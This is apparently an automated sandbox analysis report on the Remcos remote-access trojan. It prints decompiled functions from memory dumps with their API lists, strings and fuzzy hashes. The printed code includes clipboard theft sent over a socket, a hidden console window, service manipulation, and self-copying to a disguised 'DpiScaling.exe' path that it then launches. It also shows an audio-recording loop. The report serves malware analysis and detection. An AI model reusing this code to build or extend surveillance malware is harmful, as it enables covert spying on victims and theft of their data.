				void* _v112;
				char _v116;
				char _v120;
				char _v140;
				void* _v176;
				void* __ebx;
				void* __ebp;
				intOrPtr* _t28;
				char* _t36;
				intOrPtr _t45;
				intOrPtr _t46;
				void* _t57;
				intOrPtr _t69;
				void* _t111;
				void* _t113;
				void* _t115;
				signed int _t117;
				void* _t120;
				void* _t121;
				void* _t122;
				void* _t123;

				_t125 = __eflags;
				_t101 = __edx;
				_t69 = _a4;
				E004020EC(_t69,  &_v104, __edx, __eflags, _t69 + 0x1c);
				SetEvent( *(_t69 + 0x34));
				_t28 = E00401F95( &_v108);
				E004042A6( &_v108,  &_v60, 4, 0xffffffff);
				_t120 = (_t117 & 0xfffffff8) - 0x5c;
				E004020EC(_t69, _t120, _t101, _t125, 0x46c238);
				_t121 = _t120 - 0x18;
				E004020EC(_t69, _t121, _t101, _t125,  &_v76);
				E00417478( &_v140, _t101);
				_t122 = _t121 + 0x30;
				_t111 =  *_t28 - 0x3a;
				if(_t111 == 0) {
					E00401E49( &_v116, _t101, __eflags, 0);
					_t36 = E00402489();
					E00401F95(E00401E49( &_v120, _t101, __eflags, 0));
					_t101 = _t36;
					_t113 = E0040F69B();
					__eflags = _t113;
					if(_t113 == 0) {
						L7:
						E00401E74( &_v116, _t101);
						E00401FC7();
						E00401FC7();
						__eflags = 0;
						return 0;
					}
					 *0x46baec = E0040F931(_t113, "DisplayMessage");
					_t45 = E0040F931(_t113, "GetMessage");
					_t104 = "CloseChat";
					 *0x46bae4 = _t45;
					_t46 = E0040F931(_t113, "CloseChat");
					_t123 = _t122 - 0x18;
					 *0x46bae8 = _t46;
					 *0x46bae1 = 1;
					E004020EC(_t69, _t123, "CloseChat", __eflags, 0x46c2b8);
					_push(0x74);
					E00404AA4(_t69, _t69, _t104, __eflags);
					L10:
					_t115 = HeapCreate(0, 0, 0);
					__eflags =  *0x46bae4(_t115,  &_v140);
					if(__eflags != 0) {
						_t123 = _t123 - 0x18;
						E004020AB(_t69, _t123, _t104, __eflags, _v140, _t51);
						_push(0x3b);
						E00404AA4(_t69, _t69, _t104, __eflags);
						HeapFree(_t115, 0, _v176);
					}
					goto L10;
				}
				_t127 = _t111 != 1;
				if(_t111 != 1) {
					goto L7;
				}
				_t57 =  *0x46baec(E00401F95(E00401E49( &_v116, _t101, _t127, 0)));
				_t128 = _t57;
				if(_t57 == 0) {
					goto L7;
				}
				E0040427F(_t69,  &_v80, 0x45f6b8);
				_t101 =  &_v84;
				E0041739C(_t69, _t122 - 0x18,  &_v84);
				_push(0x3b);
				E00404AA4(_t69, _t69,  &_v84, _t128);
				E00401EF0();
				L4:
				while(GetMessageA( &_v52, 0, 0, 0) > 0) {
					TranslateMessage( &_v52);
					DispatchMessageA( &_v52);
				}
				if(__eflags < 0) {
					goto L4;
				}
				goto L7;
			}

0x004053ed
0x004053ed
0x004053fb
0x00405404
0x0040540c
0x00405416
0x0040542a
0x0040542f
0x00405439
0x0040543e
0x00405448
0x00405451
0x00405456
0x00405459
0x0040545c
0x0040550b
0x00405512
0x00405525
0x0040552a
0x00405533
0x00405535
0x00405537
0x004054e0
0x004054e4
0x004054ed
0x004054f6
0x004054fd
0x00405503
0x00405503
0x0040554a
0x00405551
0x00405556
0x0040555b
0x00405562
0x00405567
0x0040556a
0x00405571
0x0040557d
0x00405582
0x00405586
0x0040558b
0x00405594
0x004055a4
0x004055a6
0x004055a8
0x004055b2
0x004055b7
0x004055bb
0x004055c6
0x004055c6
0x00000000
0x004055a6
0x00405462
0x00405465
0x00000000
0x00000000
0x0040547b
0x00405482
0x00405484
0x00000000
0x00000000
0x0040548f
0x00405497
0x0040549d
0x004054a2
0x004054a6
0x004054af
0x00000000
0x004054b4
0x004054cb
0x004054d6
0x004054d6
0x004054de
0x00000000
0x00000000
0x00000000

APIs

SetEvent.KERNEL32(?,?), ref: 0040540C
GetMessageA.USER32 ref: 004054BC
TranslateMessage.USER32(?), ref: 004054CB
DispatchMessageA.USER32 ref: 004054D6
HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,0046C2B8), ref: 0040558E
HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 004055C6

Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18

Strings

DisplayMessage, xrefs: 00405539
GetMessage, xrefs: 00405545
CloseChat, xrefs: 00405556

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
String ID: CloseChat$DisplayMessage$GetMessage
API String ID: 2956720200-749203953
Opcode ID: eeb3916e9667347d05b0cb3d44af76e317f5dcc6587931f1597c26a158984571
Instruction ID: 33c0be49a712d0e34ef4d1a509f5b181f9b779c8c834d9e011c7c8049845a3e0
Opcode Fuzzy Hash: eeb3916e9667347d05b0cb3d44af76e317f5dcc6587931f1597c26a158984571
Instruction Fuzzy Hash: DF41B371604300ABCA14FB76DD4A96F77A99B85704B40093FF911A75E2EF3C8909CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00418F59, Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 89
memoryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00418F59(void* __ebx, void* __ecx, void* __edx) {
				char _v204;
				void* __edi;
				struct HWND__* _t17;
				void _t22;
				intOrPtr _t24;
				intOrPtr _t25;
				void _t26;
				void _t28;
				void* _t30;
				void* _t34;
				signed int _t37;
				void* _t45;
				void* _t47;
				void* _t51;
				void* _t53;
				void* _t55;
				void* _t59;

				_t36 = __ecx;
				_t34 = __ecx;
				AllocConsole();
				_t17 =  *0x46ca84(__ebx);
				 *0x46bebc = _t17;
				if(_t34 == 0) {
					ShowWindow(_t17, 0);
				}
				_push(_t45);
				E0043BCA5(_t36, "CONOUT$", "a", E00436A85(1));
				E00431F00(_t45,  &_v204, 0, 0xc8);
				_t47 =  &_v204 - 1;
				do {
					_t22 =  *(_t47 + 1);
					_t47 = _t47 + 1;
				} while (_t22 != 0);
				_t37 = 7;
				memcpy(_t47, "--------------------------\n", _t37 << 2);
				_t51 =  &_v204 - 1;
				do {
					_t24 =  *((intOrPtr*)(_t51 + 1));
					_t51 = _t51 + 1;
				} while (_t24 != 0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t53 =  &_v204 - 1;
				do {
					_t25 =  *((intOrPtr*)(_t53 + 1));
					_t53 = _t53 + 1;
				} while (_t25 != 0);
				asm("movsd");
				asm("movsd");
				asm("movsw");
				_t55 =  &_v204 - 1;
				do {
					_t26 =  *(_t55 + 1);
					_t55 = _t55 + 1;
				} while (_t26 != 0);
				_push(6);
				memcpy(_t55, "\n * BreakingSecurity.net\n", 0 << 2);
				asm("movsw");
				_t59 =  &_v204 - 1;
				do {
					_t28 =  *(_t59 + 1);
					_t59 = _t59 + 1;
					_t85 = _t28;
				} while (_t28 != 0);
				_t30 = memcpy(_t59, "--------------------------\n\n", 0 << 2);
				asm("movsb");
				return E0040482E(_t85, _t30, 7);
			}

0x00418f59
0x00418f63
0x00418f65
0x00418f6b
0x00418f73
0x00418f79
0x00418f7e
0x00418f7e
0x00418f85
0x00418f98
0x00418fab
0x00418fb9
0x00418fba
0x00418fba
0x00418fbd
0x00418fbe
0x00418fc4
0x00418fca
0x00418fd2
0x00418fd3
0x00418fd3
0x00418fd6
0x00418fd7
0x00418fe0
0x00418fe1
0x00418fe2
0x00418fe9
0x00418fea
0x00418fea
0x00418fed
0x00418fee
0x00418ff7
0x00418ff8
0x00418ff9
0x00419001
0x00419002
0x00419002
0x00419005
0x00419006
0x0041900a
0x00419012
0x00419014
0x0041901c
0x0041901d
0x0041901d
0x00419020
0x00419021
0x00419021
0x00419033
0x00419036
0x00419042

APIs

AllocConsole.KERNEL32(00000000), ref: 00418F65
GetConsoleWindow.KERNEL32 ref: 00418F6B
ShowWindow.USER32(00000000,00000000), ref: 00418F7E

Strings

3.2.1 Pro, xrefs: 00418FF2
--------------------------, xrefs: 00418FC5
* Remcos v, xrefs: 00418FDB
--------------------------, xrefs: 00419028
* BreakingSecurity.net, xrefs: 0041900D
CONOUT$, xrefs: 00418F93

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ConsoleWindow$AllocShow
String ID: * BreakingSecurity.net$ * Remcos v$--------------------------$--------------------------$3.2.1 Pro$CONOUT$
API String ID: 3461962499-1433448479
Opcode ID: 5e41c7e5d6c1274375fb6b9893df5f16d0cea41a7d2c607dd3fd362ef9afd43d
Instruction ID: 8874d77c640bab809850e105ba16a61c0d62e43c26ce2b4645c762b8c27fef00
Opcode Fuzzy Hash: 5e41c7e5d6c1274375fb6b9893df5f16d0cea41a7d2c607dd3fd362ef9afd43d
Instruction Fuzzy Hash: 0B214F32909A0526DF209F145C01FD6BB5AAF92744F008297F98C7F181DFA66DCA47AC

Uniqueness

Uniqueness Score: -1.00%

Function 00412D6D, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 49
clipboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00412D6D(void* __ebp, char _a16, char _a32, char _a36, void* _a128, void* _a152) {
				void* __ebx;
				void* _t16;
				struct HWND__* _t23;
				void* _t38;
				void* _t41;

				if(OpenClipboard(_t23) != 0) {
					EmptyClipboard();
					CloseClipboard();
					if(OpenClipboard(_t23) != 0) {
						_t38 = GetClipboardData(0xd);
						_t16 = GlobalLock(_t38);
						GlobalUnlock(_t38);
						CloseClipboard();
						_t29 =  !=  ? _t16 : 0x45f724;
						E0040427F(_t23,  &_a36,  !=  ? _t16 : 0x45f724);
						_t34 =  &_a32;
						E0041739C(_t23, _t41 - 0x18,  &_a32);
						_push(0x6b);
						E00404AA4(_t23, 0x46c780,  &_a32, _t16);
						E00401EF0();
					}
				}
				_t4 =  &_a16; // 0x404538
				E00401E74(_t4, _t34);
				E00401FC7();
				E00401FC7();
				return 0;
			}

0x00412d76
0x00412d7c
0x00412d82
0x00412d91
0x00412d9f
0x00412da2
0x00412dab
0x00412db1
0x00412dbe
0x00412dc6
0x00412dce
0x00412dd4
0x00412dd9
0x00412de0
0x0041318d
0x0041318d
0x00412d91
0x004133c4
0x004133c8
0x004133d4
0x004133e0
0x004133ed

APIs

OpenClipboard.USER32 ref: 00412D6E
EmptyClipboard.USER32 ref: 00412D7C
CloseClipboard.USER32 ref: 00412D82
OpenClipboard.USER32 ref: 00412D89
GetClipboardData.USER32 ref: 00412D99
GlobalLock.KERNEL32 ref: 00412DA2
GlobalUnlock.KERNEL32(00000000), ref: 00412DAB
CloseClipboard.USER32 ref: 00412DB1

Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18

Strings

8E@, xrefs: 004133C4

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
String ID: 8E@
API String ID: 2172192267-787191786
Opcode ID: a55376b11bc533d5a394031632125a0f54e1cc33cd7c52f5eff3875527e45b87
Instruction ID: f0cc4c55be78af9b9a9fc71f204afdde4753d135cfa23ffdc9e1baeae117e680
Opcode Fuzzy Hash: a55376b11bc533d5a394031632125a0f54e1cc33cd7c52f5eff3875527e45b87
Instruction Fuzzy Hash: 990105312043009BC204BF72DC49AAEB6A5AF94787F04053EF916921A2DF388A59CA5A

Uniqueness

Uniqueness Score: -1.00%

Function 00416472, Relevance: 15.1, APIs: 10, Instructions: 66
serviceCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00416472(char _a4) {
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				int _t22;
				void* _t26;
				void* _t27;

				_t22 = 0;
				_t27 = OpenSCManagerW(0, 0, 0x11);
				_t26 = OpenServiceW(_t27, E00401EEB( &_a4), 0xf003f);
				if(_t26 != 0) {
					if(ControlService(_t26, 1,  &_v32) != 0) {
						do {
							QueryServiceStatus(_t26,  &_v32);
						} while (_v28 != 1);
						StartServiceW(_t26, 0, 0);
						asm("sbb ebx, ebx");
						_t22 = 3;
						CloseServiceHandle(_t27);
						CloseServiceHandle(_t26);
					} else {
						CloseServiceHandle(_t27);
						CloseServiceHandle(_t26);
						_t22 = 2;
					}
				} else {
					CloseServiceHandle(_t27);
				}
				E00401EF0();
				return _t22;
			}

0x0041647d
0x0041648f
0x0041649e
0x004164a2
0x004164bc
0x004164ce
0x004164d3
0x004164d9
0x004164e2
0x004164f1
0x004164f6
0x004164f9
0x004164fc
0x004164be
0x004164c5
0x004164c8
0x004164ca
0x004164ca
0x004164a4
0x004164a5
0x004164a5
0x00416501
0x0041650e

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,00415E19,00000000), ref: 00416481
OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,00415E19,00000000), ref: 00416498
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415E19,00000000), ref: 004164A5
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00415E19,00000000), ref: 004164B4
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415E19,00000000), ref: 004164C5
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415E19,00000000), ref: 004164C8

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: d59cadb48f7792a6efc1e83c6762a84be932b4ef907882e6865667c411f38059
Instruction ID: 9fe600a8707d0c96f8df9479574b059baa9e236c1ba3853f5d66e3923bac8ba5
Opcode Fuzzy Hash: d59cadb48f7792a6efc1e83c6762a84be932b4ef907882e6865667c411f38059
Instruction Fuzzy Hash: 381182319403187BD721AF64DC89DFF3B7CDB45BA3700013AF90592192DB68DE46AAA9

Uniqueness

Uniqueness Score: -1.00%

Function 00441BEE, Relevance: 15.1, APIs: 10, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00441BEE(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0x457208) {
					E004401F5(_t52);
					_t26 = _a4;
				}
				E004401F5( *((intOrPtr*)(_t26 + 0x3c)));
				E004401F5( *((intOrPtr*)(_a4 + 0x30)));
				E004401F5( *((intOrPtr*)(_a4 + 0x34)));
				E004401F5( *((intOrPtr*)(_a4 + 0x38)));
				E004401F5( *((intOrPtr*)(_a4 + 0x28)));
				E004401F5( *((intOrPtr*)(_a4 + 0x2c)));
				E004401F5( *((intOrPtr*)(_a4 + 0x40)));
				E004401F5( *((intOrPtr*)(_a4 + 0x44)));
				E004401F5( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E00441AB4(5,  &_v8);
				_v8 =  &_a4;
				return E00441B04(4,  &_v8);
			}

0x00441bf4
0x00441bf7
0x00441bff
0x00441c02
0x00441c07
0x00441c0a
0x00441c0e
0x00441c19
0x00441c24
0x00441c2f
0x00441c3a
0x00441c45
0x00441c50
0x00441c5b
0x00441c69
0x00441c71
0x00441c7a
0x00441c82
0x00441c96

APIs

_free.LIBCMT ref: 00441C02

Part of subcall function 004401F5: HeapFree.KERNEL32(00000000,00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000), ref: 0044020B
Part of subcall function 004401F5: GetLastError.KERNEL32(00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000,00000000), ref: 0044021D

_free.LIBCMT ref: 00441C0E
_free.LIBCMT ref: 00441C19
_free.LIBCMT ref: 00441C24
_free.LIBCMT ref: 00441C2F
_free.LIBCMT ref: 00441C3A
_free.LIBCMT ref: 00441C45
_free.LIBCMT ref: 00441C50
_free.LIBCMT ref: 00441C5B
_free.LIBCMT ref: 00441C69

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 2bfa3934cf4ed12b4cce651615ad6e530ea0c4f31933f6cdbe87120bbe1bf93e
Instruction ID: 167aa965cb18310bd9f933f0fd8d2c8ac796a07d44e62cded6244bd04dd66799
Opcode Fuzzy Hash: 2bfa3934cf4ed12b4cce651615ad6e530ea0c4f31933f6cdbe87120bbe1bf93e
Instruction Fuzzy Hash: 9F11A775140148FFDB01FF99CC42CD93B65FF05354B0141AABB094B232DA36DA609B48

Uniqueness

Uniqueness Score: -1.00%

Function 1059B7F5, Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 324
fileCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E1059B7F5(char __ecx, intOrPtr* __edx, WCHAR* _a4, char _a8, char _a12) {
				char _v9;
				int _v20;
				char _v44;
				char _v68;
				char _v92;
				char _v116;
				char _v140;
				char _v164;
				char _v188;
				char _v212;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t62;
				void* _t63;
				signed int _t67;
				signed int _t68;
				int _t70;
				void* _t79;
				void* _t91;
				void* _t92;
				int _t94;
				void* _t99;
				void* _t100;
				void* _t113;
				int _t115;
				intOrPtr _t118;
				WCHAR* _t123;
				int _t124;
				void* _t139;
				intOrPtr* _t152;
				int _t153;
				intOrPtr* _t207;
				int _t208;
				intOrPtr* _t235;
				void* _t236;
				void* _t239;
				void* _t249;
				void* _t250;
				intOrPtr _t254;
				void* _t257;
				void* _t259;
				intOrPtr* _t260;

				_t235 = __edx;
				_v9 = __ecx;
				_t260 = __edx;
				_v20 = 0;
				_t257 = __edx + 2;
				do {
					_t62 =  *_t235;
					_t235 = _t235 + 2;
				} while (_t62 != 0);
				_t236 = _t235 - _t257;
				_t268 = _t236;
				if(_t236 == 0) {
					_t143 = _a4;
					_t238 = __ecx;
					_t63 = E105A8EC9( &_v92, __ecx, _t143);
					_t259 = 0x46c500;
					E10592D68(0x46c500, _t238, _t260, _t63);
				} else {
					CreateDirectoryW(E10592D59(0x46c530), 0);
					_t143 = _a4;
					_t139 = E10593F14(_t143,  &_v92, E10598382( &_v44, 0x46c530, _t268, 0x45f948), 0x46c530, _t268, _t143);
					_t259 = 0x46c500;
					E10592D68(0x46c500, _t138, _t260, _t139);
					E10592D5E();
				}
				E10592D5E();
				_t152 = E10592D59(_t259);
				_t67 = 0x46bb08;
				while(1) {
					_t239 =  *_t67;
					if(_t239 !=  *_t152) {
						break;
					}
					if(_t239 == 0) {
						L10:
						_t153 = 0;
						_t68 = 0;
						L12:
						if(_t68 != 0) {
							_t70 = CopyFileW("C:\Windows\SysWOW64\DpiScaling.exe", E10592D59(_t259), _t153);
							__eflags = _t70;
							if(_t70 != 0) {
								L23:
								E1059B704(0x46c4e8, E10592D59(0x46c4e8));
								__eflags = _a8 - 1;
								_pop(_t157);
								if(__eflags != 0) {
									L28:
									E10593F14(_t143,  &_v92, E105950ED(_t143,  &_v68, E105CA6ED(_t143, _t157, __eflags, 0x460008)), _t259, __eflags, 0x45ffec);
									E10592D5E();
									E105950ED(_t143,  &_v44, 0x460014);
									E105984DA(_t143,  &_v44, _t259, 0x460040);
									__eflags = _a12 - 1;
									if(__eflags == 0) {
										_t100 = E105950ED(0x4600ac,  &_v212, "C:\Windows\SysWOW64\DpiScaling.exe");
										E1059417F(E10593F14(0x4600ac,  &_v68, E10593F14(0x4600ac,  &_v116, E10593E9E( &_v140, E10593F14(0x4600ac,  &_v164, E105950ED(0x4600ac,  &_v188, 0x4600b0), _t259, __eflags, 0x45f464), _t100), _t259, __eflags, 0x45f464), _t259, __eflags, 0x4600ac));
										E10592D5E();
										E10592D5E();
										E10592D5E();
										E10592D5E();
										E10592D5E();
										E10592D5E();
									}
									_t79 = E105950ED(0x4600ac,  &_v116, 0x4600d0);
									E1059417F(E10593F14(0x4600ac,  &_v212, E10593E9E( &_v188, E10595297(0x4600ac,  &_v164, E105950ED(0x4600ac,  &_v68, 0x4600e0), __eflags, _t259), _t79), _t259, __eflags, 0x4600ac));
									E10592D5E();
									E10592D5E();
									E10592D5E();
									E10592D5E();
									E10592D5E();
									E105984DA(0x4600ac,  &_v44, _t259, 0x460140);
									_t91 = E10592D59( &_v92);
									_t92 = E105932F7();
									_t94 = E105A87B5(E10592D59( &_v44), _t92 + _t92, _t91, 0);
									__eflags = _t94;
									if(_t94 == 0) {
										L33:
										E10592D5E();
										return E10592D5E();
									} else {
										_t99 = ShellExecuteW(0, 0x45f6e4, E10592D59( &_v92), 0x45f724, 0x45f724, 0);
										__eflags = _t99 - 0x20;
										if(_t99 <= 0x20) {
											goto L33;
										}
										ExitProcess(0);
									}
								}
								_t113 = E10592D59(_t259);
								_t143 =  *0x453238;
								 *_t143(_t113, 7);
								_t249 = _t260 + 2;
								_t157 = 0;
								__eflags = 0;
								do {
									_t115 =  *_t260;
									_t260 = _t260 + 2;
									__eflags = _t115;
								} while (_t115 != 0);
								__eflags = _t260 - _t249;
								if(__eflags != 0) {
									_t157 = 0x46c530;
									 *_t143(E10592D59(0x46c530), 7);
								}
								goto L28;
							}
							__eflags = _v9 - 0x36;
							if(_v9 == 0x36) {
								goto L23;
							}
							_t207 = _t260;
							_t250 = _t207 + 2;
							do {
								_t118 =  *_t207;
								_t207 = _t207 + 2;
								__eflags = _t118 - _v20;
							} while (_t118 != _v20);
							_t208 = _t207 - _t250;
							__eflags = _t208;
							_push(_t143);
							if(_t208 == 0) {
								E10592D68(_t259, 0x36, _t260, E105A8EC9( &_v68, 0x36));
							} else {
								E10592D68(_t259, _t128, _t260, E10593F14(_t143,  &_v140, E10593F14(_t143,  &_v116, E105A8EC9( &_v68, 0x36, _t260), _t259, __eflags, 0x45f948), _t259, __eflags));
								E10592D5E();
								E10592D5E();
							}
							E10592D5E();
							_t123 = E10592D59(_t259);
							_t143 = 0x46bb08;
							_t124 = CopyFileW(0x46bb08, _t123, 0);
							__eflags = _t124;
							if(_t124 != 0) {
								goto L23;
							} else {
								E1059AC37(0x46bb08, _t259, 0x46bb08);
								return 0;
							}
						}
						E1059B704(0x46c4e8, E10592D59(0x46c4e8));
						return 1;
					}
					_t254 =  *((intOrPtr*)(_t67 + 2));
					if(_t254 !=  *((intOrPtr*)(_t152 + 2))) {
						break;
					}
					_t67 = _t67 + 4;
					_t152 = _t152 + 4;
					if(_t254 != 0) {
						continue;
					}
					goto L10;
				}
				asm("sbb eax, eax");
				_t68 = _t67 | 0x00000001;
				_t153 = 0;
				__eflags = 0;
				goto L12;
			}

0x1059b7f5
0x1059b802
0x1059b806
0x1059b808
0x1059b80b
0x1059b80e
0x1059b80e
0x1059b811
0x1059b814
0x1059b819
0x1059b819
0x1059b822
0x1059b86c
0x1059b86f
0x1059b875
0x1059b87b
0x1059b883
0x1059b824
0x1059b82d
0x1059b833
0x1059b84c
0x1059b852
0x1059b85a
0x1059b862
0x1059b867
0x1059b88b
0x1059b897
0x1059b899
0x1059b89e
0x1059b89e
0x1059b8a4
0x00000000
0x00000000
0x1059b8a9
0x1059b8c0
0x1059b8c0
0x1059b8c2
0x1059b8cd
0x1059b8cf
0x1059b8f9
0x1059b8ff
0x1059b901
0x1059b9b0
0x1059b9bc
0x1059b9c1
0x1059b9c6
0x1059b9c7
0x1059ba00
0x1059ba1e
0x1059ba27
0x1059ba34
0x1059ba41
0x1059ba46
0x1059ba4f
0x1059ba67
0x1059bab4
0x1059babc
0x1059bac4
0x1059bacf
0x1059bada
0x1059bae5
0x1059baf0
0x1059baf0
0x1059bafe
0x1059bb40
0x1059bb4b
0x1059bb56
0x1059bb61
0x1059bb69
0x1059bb71
0x1059bb7e
0x1059bb89
0x1059bb92
0x1059bba7
0x1059bbae
0x1059bbb0
0x1059bbdb
0x1059bbde
0x00000000
0x1059bbb2
0x1059bbc9
0x1059bbcf
0x1059bbd2
0x00000000
0x00000000
0x1059bbd5
0x1059bbd5
0x1059bbb0
0x1059b9cd
0x1059b9d2
0x1059b9d9
0x1059b9db
0x1059b9de
0x1059b9de
0x1059b9e0
0x1059b9e0
0x1059b9e3
0x1059b9e6
0x1059b9e6
0x1059b9eb
0x1059b9ef
0x1059b9f3
0x1059b9fe
0x1059b9fe
0x00000000
0x1059b9ef
0x1059b907
0x1059b90b
0x00000000
0x00000000
0x1059b911
0x1059b913
0x1059b916
0x1059b916
0x1059b919
0x1059b91c
0x1059b91c
0x1059b922
0x1059b922
0x1059b928
0x1059b92c
0x1059b979
0x1059b92e
0x1059b956
0x1059b961
0x1059b969
0x1059b969
0x1059b981
0x1059b98b
0x1059b991
0x1059b997
0x1059b99d
0x1059b99f
0x00000000
0x1059b9a1
0x1059b9a4
0x00000000
0x1059b9a9
0x1059b99f
0x1059b8dd
0x00000000
0x1059b8e4
0x1059b8ab
0x1059b8b3
0x00000000
0x00000000
0x1059b8b5
0x1059b8b8
0x1059b8be
0x00000000
0x00000000
0x00000000
0x1059b8be
0x1059b8c6
0x1059b8c8
0x1059b8cb
0x1059b8cb
0x00000000

APIs

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 1059B82D
CopyFileW.KERNEL32(C:\Windows\SysWOW64\DpiScaling.exe,00000000,00000000,00000000), ref: 1059B8F9
CopyFileW.KERNEL32(C:\Windows\SysWOW64\DpiScaling.exe,00000000,00000000,00000000), ref: 1059B997
ShellExecuteW.SHELL32(00000000,0045F6E4,00000000,0045F724,0045F724,00000000), ref: 1059BBC9
ExitProcess.KERNEL32 ref: 1059BBD5

Strings

Remcos, xrefs: 1059B8D1, 1059B9B0
C:\Windows\SysWOW64\DpiScaling.exe, xrefs: 1059B899, 1059B8F4, 1059B991, 1059B996, 1059B9A1, 1059BA62
6, xrefs: 1059B907

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: CopyFile$CreateDirectoryExecuteExitProcessShell
String ID: 6$C:\Windows\SysWOW64\DpiScaling.exe$Remcos
API String ID: 1208941977-2625985458
Opcode ID: 2790b9d6b261eb0ed5398a12518422b092d0988f6fb304b9dfa6f8c1d56f2ab6
Instruction ID: b28f064c6d40ea9ab774491be4a8d813731f9a680eb384232f47038ccbd7b813
Opcode Fuzzy Hash: 2790b9d6b261eb0ed5398a12518422b092d0988f6fb304b9dfa6f8c1d56f2ab6
Instruction Fuzzy Hash: 21A1C439A0020496D718EBA4DC9AEEE7B39EF94340F50406EF006A7194EF757E4BCA55

Uniqueness

Uniqueness Score: -1.00%

Function 105A783A, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 185
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E105A783A(void* __ecx, void* __edx, char _a4) {
				char _v24;
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t25;
				void* _t28;
				void* _t43;
				void* _t60;
				void* _t63;
				void* _t67;
				struct _SECURITY_ATTRIBUTES* _t89;
				void* _t109;
				void* _t111;
				intOrPtr* _t112;
				void* _t114;
				void* _t118;

				_t103 = __edx;
				_t67 = __ecx;
				_t109 = __edx;
				if(E105A7A80( &_a4, __ecx, __ecx) == 0xffffffff) {
					_t63 = E10592D59( &_a4);
					_t103 = 0x30;
					E10592D68( &_a4, 0x30, _t111, E105A8EC9( &_v28, 0x30, _t63));
					E10592D5E();
				}
				_t25 = E105932F7();
				_t120 = _t25;
				if(_t25 == 0) {
					__eflags = PathFileExistsW(E10592D59( &_a4));
					if(__eflags != 0) {
						goto L4;
					} else {
						E10592EF2(_t67, _t114 - 0x18, 0x45f6bc);
						_push(0xa8);
						E10595912(_t67, 0x46ca18, _t103, __eflags);
					}
				} else {
					_t60 = E10592D59( &_a4);
					_t118 = _t114 - 0x18;
					E10592F5A(_t67, _t118, _t103, _t120, _t109);
					E105A88BC(_t60);
					_t114 = _t118 + 0x18;
					L4:
					_t28 = E105A8148( &_v124, _t67);
					_t108 = E10593E9E( &_v28, E10593F14(_t67,  &_v76, E1059ACD7( &_v100, 0x465a28, _t120,  &_a4), _t109, _t120, 0x465a18), _t28);
					E10593F14(_t67,  &_v52, _t32, _t109, _t120, 0x4659fc);
					E10592D5E();
					E10592D5E();
					E10592D5E();
					E10592D5E();
					mciSendStringW(E10592D59( &_v52), 0, 0, 0);
					_t112 =  *0x4533e8;
					 *_t112(0, 0, 0);
					_t115 = _t114 - 0x18;
					E10592EF2(0, _t114 - 0x18, 0x45f6bc);
					E10595912(0, 0x46ca18, _t32, 0, 0xa9, 0x465a38);
					_t43 = CreateEventA(0, 1, 0, 0);
					while(1) {
						L5:
						 *0x46bea8 = _t43;
						while(1) {
							_t122 = _t43;
							if(_t43 == 0) {
								break;
							}
							__eflags =  *0x46bea6;
							if( *0x46bea6 != 0) {
								 *_t112(0x465a44, 0, 0, 0);
								 *0x46bea6 = 0;
							}
							__eflags =  *0x46bea5;
							if( *0x46bea5 != 0) {
								 *_t112(0x465a50, 0, 0, 0);
								 *0x46bea5 = 0;
							}
